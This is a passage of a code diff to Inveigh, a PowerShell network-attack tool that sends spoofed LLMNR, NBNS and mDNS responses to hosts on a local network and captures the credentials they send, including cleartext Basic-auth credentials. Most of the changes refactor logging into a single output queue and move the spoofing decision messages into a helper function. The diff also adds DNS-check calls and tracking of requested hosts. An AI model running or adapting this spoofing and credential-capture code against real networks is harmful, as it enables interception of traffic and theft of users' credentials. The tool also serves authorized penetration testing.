+ $inveigh.cleartext_list.Add($cleartext_credentials) > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP") > $null
if($inveigh.file_output)
{
- $inveigh.console_queue.Add("$HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file)
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file) > $null
}
}
@@ -2189,7 +2256,9 @@ $HTTP_scriptblock =
# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer
$sniffer_scriptblock =
{
- param ($IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,$mDNS_response_message,$mDNSTypes,$mDNSTTL,$NBNS,$NBNS_response_message,$NBNSTypes,$NBNSTTL,$SMB,$SpooferHostsIgnore,$SpooferHostsReply,$SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply,
+ param ($DNSHostsIgnore,$DNSThreshold,$DNSTTL,$Evade,$IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,
+ $mDNS_response_message,$mDNSTypes,$mDNSTTL,$NBNS,$NBNS_response_message,$NBNSTypes,$NBNSTTL,$SMB,
+ $SpooferHostsIgnore,$SpooferHostsReply,$SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply,
$SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval)
$sniffer_running = $true
@@ -2210,19 +2279,8 @@ $sniffer_scriptblock =
}
catch
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting sniffer/spoofer") > $null
$sniffer_running = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")
- }
-
}
$sniffer_socket.Bind($end_point)
@@ -2364,6 +2422,7 @@ $sniffer_scriptblock =
if(([System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -or [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01') -and [System.BitConverter]::ToString($payload_bytes[10..11]) -ne '00-01')
{
$UDP_length[0] += 12
+ $NBNS_response_type = "[+]"
$NBNS_response_data = $payload_bytes[13..$payload_bytes.Length] +
$NBNS_TTL_bytes +
@@ -2491,19 +2550,8 @@ $sniffer_scriptblock =
$NBNS_UDP_client.Connect($NBNS_learning_destination_endpoint)
$NBNS_UDP_client.Send($NBNS_request_packet,$NBNS_request_packet.Length)
$NBNS_UDP_client.Close()
- $NBNS_learning_log.Add("$(Get-Date -format 's') $NBNS_transaction_ID $NBNS_query_string")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
- }
-
+ $NBNS_learning_log.Add("$(Get-Date -format s) $NBNS_transaction_ID $NBNS_query_string") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] NBNS request $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString) > $null
}
}
@@ -2522,7 +2570,19 @@ $sniffer_scriptblock =
$NBNS_destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port)
$NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point)
$NBNS_send_socket.Close()
- $NBNS_response_message = "- response sent"
+ $NBNS_response_message = "[spoofed response sent]"
+
+ if($inveigh.requested_host_IP_list -NotContains "$source_IP $NBNS_query_string")
+ {
+ $inveigh.requested_host_IP_list.Add("$source_IP $NBNS_query_string") > $null
+ $inveigh.requested_host_list.Add($NBNS_query_string.ToLower()) > $null
+ }
+
+ if($inveigh.DNS)
+ {
+ DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
+ }
+
}
else
{
@@ -2537,73 +2597,17 @@ $sniffer_scriptblock =
{
$NBNS_request_ignore = $true
}
- elseif($NBNSTypes -notcontains $NBNS_query_type)
- {
- $NBNS_response_message = "- disabled NBNS type"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string)
- {
- $NBNS_response_message = "- $NBNS_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string)
- {
- $NBNS_response_message = "- $NBNS_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $NBNS_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $NBNS_response_message = "- $source_IP is on ignore list"
- }
- elseif($NBNS_query_string.Trim() -eq '*')
- {
- $NBNS_response_message = "- NBSTAT request"
- }
- elseif($inveigh.valid_host_list -contains $NBNS_query_string)
- {
- $NBNS_response_message = "- $NBNS_query_string is a valid host"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
- {
- $NBNS_response_message = "- previous capture from $source_IP"
- }
- elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
- {
- $NBNS_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
- }
- elseif($source_IP -eq $IP -and !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
- {
- $NBNS_response_message = "- local request"
- }
- elseif($destination_IP.IPAddressToString -eq $IP)
- {
- $NBNS_response_message = "- ResponderGuard detected and ignored"
- }
- else
- {
- $NBNS_response_message = "- something went wrong"
- }
-
+
+ $NBNS_response_message = SpooferResponseMessage -query_string $NBNS_query_string -mDNS_type ""
+ $NBNS_response_type = $NBNS_response_message[0]
+ $NBNS_response_message = $NBNS_response_message[1]
}
}
if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00')
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
- }
-
+ $inveigh.output_queue.Add("$NBNS_response_type [$(Get-Date -format s)] NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") > $null
}
elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
@@ -2613,19 +2617,8 @@ $sniffer_scriptblock =
if($inveigh.valid_host_list -notcontains $NBNS_query_string)
{
- $inveigh.valid_host_list.Add($NBNS_query_string)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
- }
-
+ $inveigh.valid_host_list.Add($NBNS_query_string) > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP [$NBNS_query_string added to valid host list]") > $null
}
}
@@ -2643,6 +2636,7 @@ $sniffer_scriptblock =
$mDNS_query_payload_bytes = $payload_bytes[(12)..($payload_bytes.Length - 5)]
$mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
$mDNS_query_string_full = $mDNS_query_string + ".local"
+ $mDNS_response_type = "[+]"
$mDNS_response_data = $mDNS_query_payload_bytes +
0x00,0x01,0x00,0x01 +
@@ -2670,52 +2664,18 @@ $sniffer_scriptblock =
$destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
$send_socket.SendTo($mDNS_response_packet,$destination_point)
$send_socket.Close()
- $mDNS_response_message = "- response sent"
+ $mDNS_response_message = "[spoofed response sent]"
}
else
{
-
- if($mDNSTypes -notcontains 'QU')
- {
- $mDNS_response_message = "- disabled mDNS type"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is on ignore list"
- }
- else
- {
- $mDNS_response_message = "- not spoofed due to previous capture"
- }
-
+ $mDNS_response_message = SpooferResponseMessage -query_string $mDNS_query_string -mDNS_type "QU"
+ $mDNS_response_type = $mDNS_response_message[0]
+ $mDNS_response_message = $mDNS_response_message[1]
}
}
- $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
+ $inveigh.output_queue.Add("$mDNS_response_type [$(Get-Date -format s)] mDNS(QU) request $mDNS_query_string_full received from $source_IP $mDNS_response_message") > $null
}
elseif([System.BitConverter]::ToString($payload_bytes) -like '*-05-6C-6F-63-61-6C-00-00-01-00-01-*')
{
@@ -2723,6 +2683,7 @@ $sniffer_scriptblock =
$mDNS_query_payload_bytes = $payload_bytes[12..($payload_bytes[12] + 12)]
$mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
$mDNS_query_string_full = $mDNS_query_string + ".local"
+ $mDNS_response_type = "[+]"
$mDNS_response_data = $mDNS_query_payload_bytes +
0x05,0x6c,0x6f,0x63,0x61,0x6c,0x00 +
@@ -2752,52 +2713,18 @@ $sniffer_scriptblock =
$destination_point = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.251",5353)
$send_socket.SendTo($mDNS_response_packet,$destination_point)
$send_socket.Close()
- $mDNS_response_message = "- response sent"
+ $mDNS_response_message = "[spoofed response sent]"
}
else
{
-
- if($mDNSTypes -notcontains 'QM')
- {
- $mDNS_response_message = "- disabled mDNS type"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is on ignore list"
- }
- else
- {
- $mDNS_response_message = "- not spoofed due to previous capture"
- }
-
+ $mDNS_response_message = SpooferResponseMessage -query_string $mDNS_query_string -mDNS_type "QM"
+ $mDNS_response_type = $mDNS_response_message[0]
+ $mDNS_response_message = $mDNS_response_message[1]
}
}
- $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
+ $inveigh.output_queue.Add("$($mDNS_response_message[0]) [$(Get-Date -format s)] mDNS(QM) request $mDNS_query_string_full received from $source_IP $($mDNS_response_message[1])") > $null
}
}
@@ -2809,6 +2736,7 @@ $sniffer_scriptblock =
{
$UDP_length[0] += $payload_bytes.Length - 2
$LLMNR_response_data = $payload_bytes[12..$payload_bytes.Length]
+ $LLMNR_response_type = "[+]"
$LLMNR_response_data += $LLMNR_response_data +
$LLMNR_TTL_bytes +
@@ -2883,19 +2811,8 @@ $sniffer_scriptblock =
$LLMNR_UDP_client.Connect($LLMNR_learning_destination_endpoint)
$LLMNR_UDP_client.Send($LLMNR_request_packet,$LLMNR_request_packet.Length)
$LLMNR_UDP_client.Close()
- $LLMNR_learning_log.Add("$(Get-Date -format 's') $LLMNR_transaction_ID $LLMNR_query_string")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
- }
-
+ $LLMNR_learning_log.Add("$(Get-Date -format s) $LLMNR_transaction_ID $LLMNR_query_string") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] LLMNR request $LLMNR_query_string sent to 224.0.0.252") > $null
}
}
@@ -2914,7 +2831,19 @@ $sniffer_scriptblock =
$LLMNR_destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
$LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point)
$LLMNR_send_socket.Close()
- $LLMNR_response_message = "- response sent"
+ $LLMNR_response_message = "[spoofed response sent]"
+
+ if($inveigh.requested_host_IP_list -notcontains "$source_IP $LLMNR_query_string")
+ {
+ $inveigh.requested_host_IP_list.Add("$source_IP $LLMNR_query_string") > $null
+ $inveigh.requested_host_list.Add($LLMNR_query_string.ToLower()) > $null
+ }
+
+ if($inveigh.DNS)
+ {
+ DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
+ }
+
}
else
{
@@ -2924,62 +2853,16 @@ $sniffer_scriptblock =
}
else
{
-
- if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
- {
- $LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string)
- {
- $LLMNR_response_message = "- $LLMNR_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $LLMNR_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $LLMNR_response_message = "- $source_IP is on ignore list"
- }
- elseif($inveigh.valid_host_list -contains $LLMNR_query_string)
- {
- $LLMNR_response_message = "- $LLMNR_query_string is a valid host"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
- {
- $LLMNR_response_message = "- previous capture from $source_IP"
- }
- elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
- {
- $LLMNR_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
- }
- elseif($destination_IP.IPAddressToString -eq $IP)
- {
- $LLMNR_response_message = "- ResponderGuard detected and ignored"
- }
- else
- {
- $LLMNR_response_message = "- something went wrong"
- }
-
+ $LLMNR_response_message = SpooferResponseMessage -query_string $LLMNR_query_string -mDNS_type ""
+ $LLMNR_response_type = $LLMNR_response_message[0]
+ $LLMNR_response_message = $LLMNR_response_message[1]
}
}
if(!$LLMNR_request_ignore)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- }
-
+ $inveigh.output_queue.Add("$LLMNR_response_type [$(Get-Date -format s)] LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") > $null
}
}
@@ -3016,19 +2899,8 @@ $sniffer_scriptblock =
if($inveigh.valid_host_list -notcontains $LLMNR_query_string)
{
- $inveigh.valid_host_list.Add($LLMNR_query_string)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
- }
-
+ $inveigh.valid_host_list.Add($LLMNR_query_string) > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $LLMNR_query_string LLMNR response $LLMNR_response_IP received from $source_IP [$LLMNR_query_string added to valid host list]") > $null
}
}
@@ -3062,19 +2934,8 @@ $LLMNR_spoofer_scriptblock =
}
catch
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting LLMNR spoofer") > $null
$LLMNR_running = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
- }
-
}
$LLMNR_multicast_group = [IPAddress]"224.0.0.252"
@@ -3112,6 +2973,7 @@ $LLMNR_spoofer_scriptblock =
$LLMNR_query_string = [Text.Encoding]::UTF8.GetString($LLMNR_request_data[13..($LLMNR_request_data[12] + 12)])
$source_IP = $LLMNR_listener_endpoint.Address.IPAddressToString
+ $LLMNR_response_type = "[+]"
if(!$Inspect -and ($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
@@ -3125,56 +2987,28 @@ $LLMNR_spoofer_scriptblock =
$LLMNR_multicast_group = [IPAddress]"224.0.0.252"
$LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
$LLMNR_UDP_client.Client.ReceiveTimeout = 5000
- $LLMNR_response_message = "- response sent"
- }
- else
- {
+ $LLMNR_response_message = "[spoofed response sent]"
- if($Inspect)
- {
- $LLMNR_response_message = "- inspect only"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
- {
- $LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string)
- {
- $LLMNR_response_message = "- $LLMNR_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+ if($inveigh.requested_host_IP_list -notcontains "$source_IP $LLMNR_query_string")
{
- $LLMNR_response_message = "- $source_IP is not on reply list"
+ $inveigh.requested_host_IP_list.Add("$source_IP $LLMNR_query_string") > $null
+ $inveigh.requested_host_list.Add($LLMNR_query_string.ToLower()) > $null
}
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $LLMNR_response_message = "- $source_IP is on ignore list"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP)
- {
- $LLMNR_response_message = "- previous capture from $source_IP"
- }
- else
+
+ if($inveigh.DNS)
{
- $LLMNR_response_message = "- something went wrong"
+ DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
}
-
+
+ }
+ else
+ {
+ $LLMNR_response_message = SpooferResponseMessage -query_string $LLMNR_query_string -mDNS_type ""
}
if($LLMNR_request_data)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- }
-
+ $inveigh.output_queue.Add("$LLMNR_response_type [$(Get-Date -format s)] LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") > $null
}
$LLMNR_request_data = ""
@@ -3199,19 +3033,8 @@ $mDNS_spoofer_scriptblock =
}
catch
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting mDNS spoofer")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting mDNS spoofer") > $null
$mDNS_running = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting mDNS spoofer")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Error starting mDNS spoofer")
- }
-
}
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
@@ -3249,6 +3072,7 @@ $mDNS_spoofer_scriptblock =
$mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data
$mDNS_query_string_full = $mDNS_query_string + ".local"
$source_IP = $mDNS_listener_endpoint.Address.IPAddressToString
+ $mDNS_response_type = "[+]"
if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
@@ -3262,60 +3086,18 @@ $mDNS_spoofer_scriptblock =
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
$mDNS_UDP_client.Client.ReceiveTimeout = 5000
- $mDNS_response_message = "- response sent"
+ $mDNS_response_message = "[spoofed response sent]"
}
else
{
-
- if($Inspect)
- {
- $mDNS_response_message = "- inspect only"
- }
- elseif($mDNSTypes -notcontains 'QU')
- {
- $mDNS_response_message = "- disabled mDNS type"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is on ignore list"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP)
- {
- $mDNS_response_message = "- previous capture from $source_IP"
- }
- else
- {
- $mDNS_response_message = "- something went wrong"
- }
-
+ $mDNS_response_message = SpooferResponseMessage -query_string $mDNS_query_string -mDNS_type "QU"
+ $mDNS_response_type = $mDNS_response_message[0]
+ $mDNS_response_message = $mDNS_response_message[1]
}
if($mDNS_request_data)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
+ $inveigh.output_queue.Add("$mDNS_response_type [$(Get-Date -format s)] mDNS(QU) request $mDNS_query_string_full received from $source_IP $LLMNR_response_message") > $null
}
$mDNS_request_data = ""
@@ -3334,6 +3116,7 @@ $mDNS_spoofer_scriptblock =
$mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data
$mDNS_query_string_full = $mDNS_query_string + ".local"
$source_IP = $mDNS_listener_endpoint.Address.IPAddressToString
+ $mDNS_response_type = "[+]"
if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
@@ -3347,60 +3130,18 @@ $mDNS_spoofer_scriptblock =
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
$mDNS_UDP_client.Client.ReceiveTimeout = 5000
- $mDNS_response_message = "- response sent"
+ $mDNS_response_message = "[spoofed response sent]"
}
else
{
-
- if($Inspect)
- {
- $mDNS_response_message = "- inspect only"
- }
- elseif($mDNSTypes -notcontains 'QM')
- {
- $mDNS_response_message = "- disabled mDNS type"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is on ignore list"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP)
- {
- $mDNS_response_message = "- previous capture from $source_IP"
- }
- else
- {
- $mDNS_response_message = "- something went wrong"
- }
-
+ $mDNS_response_message = SpooferResponseMessage -query_string $mDNS_query_string -mDNS_type "QM"
+ $mDNS_response_type = $mDNS_response_message[0]
+ $mDNS_response_message = $mDNS_response_message[1]
}
if($mDNS_request_data)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
+ $inveigh.output_queue.Add("$mDNS_response_type [$(Get-Date -format s)] mDNS(QM) request $mDNS_query_string_full received from $source_IP $mDNS_response_message") > $null
}
$mDNS_request_data = ""
@@ -3425,19 +3166,8 @@ $NBNS_spoofer_scriptblock =
}
catch
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting NBNS spoofer") > $null
$NBNS_running = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
- }
-
}
